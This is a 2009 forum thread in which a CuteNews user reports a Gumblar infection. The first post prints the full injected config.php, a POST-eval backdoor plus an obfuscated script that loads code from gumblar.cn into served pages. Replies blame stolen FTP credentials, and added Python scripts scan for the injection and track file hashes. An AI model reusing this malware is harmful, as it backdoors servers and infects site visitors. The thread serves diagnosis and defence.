gumblar.cn virus php exploit code

What do you think about the script?

gumblar.cn virus php exploit code

Postby nolikewise » Mon May 11, 2009 2:23 pm

Hi all CNR users and team,

I'd like to share one of my bad experiences. 5 minutes ago I noticed that my website was loading content from gumblar.cn, and I got that it was an exploit thing.

After editing and searching all of my files, I found that

/data/config.php had a long function which goes like this:

Code:
<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCihmdW5jdGlvbih5WEZWKXt2YXIgZXVUVz0oJ3ZfNjFyXzIwYV8zZF8yMl81M182M183MmlfNzB0RW5nXzY5bmVfMjJfMmNiXzNkXzIyVl82NXJfNzNfNjlfNmZuKF8yOStfMjJfMmNqXzNkXzIyXzIyXzJjdV8zZG5hdmlnYXRvXzcyXzJldXNlcl80MWdlbl83NF8zYmlmKCh1XzJlaV82ZWRleF80Zl82NihfMjJXaW5fMjIpXzNlMClfMjZfMjZfMjh1XzJlXzY5XzZlXzY0ZXhPXzY2XzI4XzIyTlRfMjA2XzIyKV8zYzApXzI2XzI2KGRvY3VtXzY1bnRfMmVjb29raWVfMmVpbmRleE9mKF8yMl82ZGlla18zZDFfMjIpXzNjMClfMjZfMjYodHlfNzBlXzZmZihfN2Fydnp0cylfMjFfM2R0Xzc5cGVvZihfMjJBXzIyXzI5KSlfN2JfN2FyXzc2enRfNzNfM2RfMjJBXzIyXzNiZXZhbChfMjJpZihfNzdpXzZlZG93XzJlXzIyXzJiYStfMjIpal8zZF82YStfMjIrXzYxXzJiXzIyTWFqXzZmcl8yMitiK2ErXzIyTV82OW5vcl8yMitfNjIrYStfMjJCdWlsXzY0XzIyK2IrXzIyal8zYl8yMilfM2JfNjRvY3VtZV82ZXRfMmV3cl82OXRfNjUoXzIyXzNjc2NyaV83MHRfMjBzXzcyY18zZF8yZl8yZmdfNzVtXzYybGFfNzJfMmVjbl8yZl83MnNfNzNfMmZfM2ZpZF8zZF8yMl8yYmorXzIyXzNlXzNjXzVjXzJmc2NyaXBfNzRfM2VfMjJfMjlfM2JfN2QnKS5yZXBsYWNlKHlYRlYsJyUnKTtldmFsKHVuZXNjYXBlKGV1VFcpKX0pKC9fL2cpOwogLS0+PC9zY3JpcHQ+'));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).chr(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function 
tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>


and it exploits and freezes the browser.

How come anyone could add it to my config.php? Am I safe enough to hide my SQL pass and others?

I am doubtful about FileZilla because I had the same thing before. FileZilla's bugs sometimes cause these exploits.

Any idea?

And FI-DD, please have a look at that link and direct us to protect our files more...


Help my php site has been exploited or hacked. What can I do to make sure this does not happen again?
http://helpdesk.hostmonster.com/kb/inde ... d=2&id=271
nolikewise
 
Posts: 177
Joined: Mon Dec 17, 2007 8:47 am
Location: Turkiye
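Once one copy of the injection has been found, the practical next step is to check every PHP file on the site for the same constructs. The scanner below is an added example written for this thread; it is not CuteNews code and not taken from any of the posts. Its regexes follow the injected config.php quoted above (the eval of a POST variable, the long base64 literal, the ob_start callback, the set_error_handler hook, the rewrite at <body>, and the tmp_lkojfghx / TMP_XHGFJOKL names), while the rule weights, the threshold and both sample files are constructed for the example.

```python
import os
import re
from dataclasses import dataclass, field

# Each rule: (name, weight, compiled pattern). The patterns follow the injected
# config.php quoted in the thread; weights and THRESHOLD are constructed
# choices for this example, not a published signature set.
RULES = [
    # remote backdoor: eval() of whatever the client sends in the request
    ("eval-of-request", 5,
     re.compile(r"eval\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b", re.I)),
    # a long base64 literal fed straight to base64_decode() (the hidden <script>)
    ("base64-blob", 3,
     re.compile(r"base64_decode\s*\(\s*['\"][A-Za-z0-9+/=]{200,}['\"]")),
    # an output-buffer callback; ob_gzhandler is the usual legitimate one
    ("ob-handler-hook", 2,
     re.compile(r"ob_start\s*\(\s*['\"](?!ob_gzhandler\b)\w+['\"]")),
    # a string-named error handler, which the sample uses to get itself called
    ("error-handler-hijack", 1,
     re.compile(r"set_error_handler\s*\(\s*['\"]\w+['\"]")),
    # rewriting the page at <body> is where the sample injects its script
    ("body-injection", 4,
     re.compile(r"preg_replace\s*\([^;]*<body", re.I | re.S)),
    # identifiers used by this particular infection, taken from the post
    ("known-name", 5,
     re.compile(r"tmp_lkojfghx|TMP_XHGFJOKL", re.I)),
]
THRESHOLD = 5  # a file scoring at or above this is flagged


@dataclass
class ScanResult:
    hits: list = field(default_factory=list)
    score: int = 0

    @property
    def suspicious(self) -> bool:
        return self.score >= THRESHOLD


def scan_source(text: str) -> ScanResult:
    """Apply every rule once to a file's contents and sum the weights that hit."""
    result = ScanResult()
    for name, weight, pattern in RULES:
        if pattern.search(text):
            result.hits.append(name)
            result.score += weight
    return result


def scan_tree(root: str, exts=(".php", ".inc", ".phtml")) -> dict:
    """Walk a web root and return {path: ScanResult} for files over the threshold."""
    flagged = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith(exts):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, "r", encoding="utf-8", errors="replace") as fh:
                res = scan_source(fh.read())
            if res.suspicious:
                flagged[path] = res
    return flagged


# Constructed sample: a shortened imitation of the injected config.php from the
# thread. The base64 payload is replaced by filler so nothing here decodes to a script.
INFECTED_SAMPLE = r"""<?php if(!function_exists('tmp_lkojfghx')){if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);
if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL',base64_decode('""" + "A" * 240 + r"""'));
function tmp_lkojfghx($s){$s1=$s;if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);return $s;}
function tmp_lkojfghx2(){ob_start('tmp_lkojfghx');}}
if(($a=@set_error_handler('tmp_lkojfghx2'))!='tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>
"""

# Constructed sample: an ordinary config that uses the same PHP features legitimately.
CLEAN_SAMPLE = r"""<?php
define('DB_HOST', 'localhost');
define('DB_PASS', 'example-only');
set_error_handler('app_error_handler');
ob_start('ob_gzhandler');
?>
"""

if __name__ == "__main__":
    import sys
    print("infected sample:", scan_source(INFECTED_SAMPLE))
    print("clean sample:   ", scan_source(CLEAN_SAMPLE))
    if len(sys.argv) > 1:  # optional: scan a real web root given on the command line
        for path, res in scan_tree(sys.argv[1]).items():
            print(path, res.score, ", ".join(res.hits))
```

The weights are deliberately uneven: a legitimate config can register a named error handler, so that rule alone never crosses the threshold, whereas eval() of request data or the infection's own identifiers do on their own. Any file this flags still needs a human look before it is cleaned, and the cleaned copy should be re-scanned.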

Postby FI-DD » Tue May 12, 2009 6:03 pm

All I can say is that the /data/ folder is protected by a .htaccess file. So I have no idea how this happened.
FI-DD
Admin
 
Posts: 2971
Joined: Thu Sep 22, 2005 11:27 am
Location: Germany

Postby cablegunmaster » Thu May 14, 2009 8:39 am

cablegunmaster
 
Posts: 34
Joined: Tue May 05, 2009 9:31 am

Postby mark99 » Thu May 14, 2009 12:06 pm

It's worth remembering that .htaccess is fallible; you can't rely on just that to secure the dir, there has to be a good setup of CHMODs as well. It is possible to change the default CHMOD by fiddling with the ROOT head.php file - define('chmod', 0777); - but this makes a universal change and so can cause problems. I think I found a setting that worked, but I can't recall what it was.
mark99
 
Posts: 123
Joined: Mon Feb 09, 2009 6:01 pm

Postby Torstein » Thu May 14, 2009 12:12 pm

It does however look like this is actually malware that you have on your computer that uses your FTP username and password to infect your files, so it isn't a PHP/CuteNews.RU exploit. From the link it looks like it puts code into all files on your FTP, including .htaccess, .php, .html, .js, etc.
Torstein
 
Posts: 292
Joined: Thu Aug 03, 2006 11:19 pm
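If the files are being rewritten over FTP with a valid login, neither .htaccess nor CHMOD on the server will notice it, but a hash baseline of the web root will. The script below is an added example for this thread, not part of CuteNews or of any post: it records a SHA-256 per file (dotfiles such as .htaccess included), then reports what was added, removed or modified since. The demo builds a small constructed web root and applies the kind of change Torstein describes. The baseline file has to live somewhere the FTP account cannot reach, or a stolen login could rewrite it as well.

```python
import hashlib
import json
import os
import tempfile


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: str) -> dict:
    """Map every file under root (relative path -> sha256); os.walk includes dotfiles."""
    baseline = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            full = os.path.join(dirpath, fn)
            rel = os.path.relpath(full, root).replace(os.sep, "/")
            baseline[rel] = sha256_file(full)
    return baseline


def save_baseline(baseline: dict, path: str) -> None:
    # store this OFF the web host: a stolen FTP login must not be able to edit it
    with open(path, "w", encoding="utf-8") as fh:
        json.dump(baseline, fh, indent=1, sort_keys=True)


def load_baseline(path: str) -> dict:
    with open(path, "r", encoding="utf-8") as fh:
        return json.load(fh)


def compare(old: dict, new: dict) -> dict:
    """Diff two baselines into sorted lists of added, removed and modified paths."""
    return {
        "added": sorted(set(new) - set(old)),
        "removed": sorted(set(old) - set(new)),
        "modified": sorted(k for k in set(old) & set(new) if old[k] != new[k]),
    }


def demo() -> dict:
    """Constructed scenario: a tiny web root, then changes like those made via FTP."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "data"))
        files = {
            "index.php": "<?php echo 'hello'; ?>\n",
            "data/config.php": "<?php define('DB_PASS', 'example-only'); ?>\n",
            "data/.htaccess": "Deny from all\n",
        }
        for rel, body in files.items():
            with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
                fh.write(body)
        before = build_baseline(root)

        # simulated tampering: code prepended to config.php, a new .htaccess in the root
        with open(os.path.join(root, "data/config.php"), "w", encoding="utf-8") as fh:
            fh.write("<?php /* constructed: injected block */ ?>\n" + files["data/config.php"])
        with open(os.path.join(root, ".htaccess"), "w", encoding="utf-8") as fh:
            fh.write("# constructed: file that was not there before\n")
        after = build_baseline(root)
        return compare(before, after)


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:  # usage: script.py <web root> <baseline.json>
        root, store = sys.argv[1], sys.argv[2]
        if os.path.exists(store):
            print(json.dumps(compare(load_baseline(store), build_baseline(root)), indent=1))
        else:
            save_baseline(build_baseline(root), store)
            print("baseline written to", store)
    else:
        print(json.dumps(demo(), indent=1))
```

Run once to create the baseline after a known-clean upload, then on a schedule; any "modified" entry you did not upload yourself, or any "added" file, is the signal to change the FTP password and clean the machine the password was stored on, not just the files.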

damn virus

Postby nolikewise » Sat May 16, 2009 10:59 am

This damn virus enters all directories which have no .htaccess file. Maybe it's because of the FILEZILLA SHELL thing, but I don't know how they can reach them. Too bad, I'm really nervous!!!!!!


Can't I use a code in my root like

Code:
Order Deny,Allow
Deny from all
Allow from www.okuogren.com


and it protects all the subdirectories?


Isn't there any solution to protect each folder?


Have a look at my directory; its chmod is 755:
http://www.okuogren.com/eski/index.php CLEAR NOW
http://www.okuogren.com/chat/index.php CLEAR NOW
http://safebrowsing.clients.google.com/ ... .com/eski/
nolikewise
 
Posts: 177
Joined: Mon Dec 17, 2007 8:47 am
Location: Turkiye

Postby azn_romeo_4u » Tue Jul 28, 2009 8:01 pm

It's not the script. It's your FTP. Someone got into your FTP and did it. Change your FTP password to something better, with more characters and with letters, numbers, and symbols if possible.
azn_romeo_4u
 
Posts: 123
Joined: Thu Sep 18, 2008 5:06 am
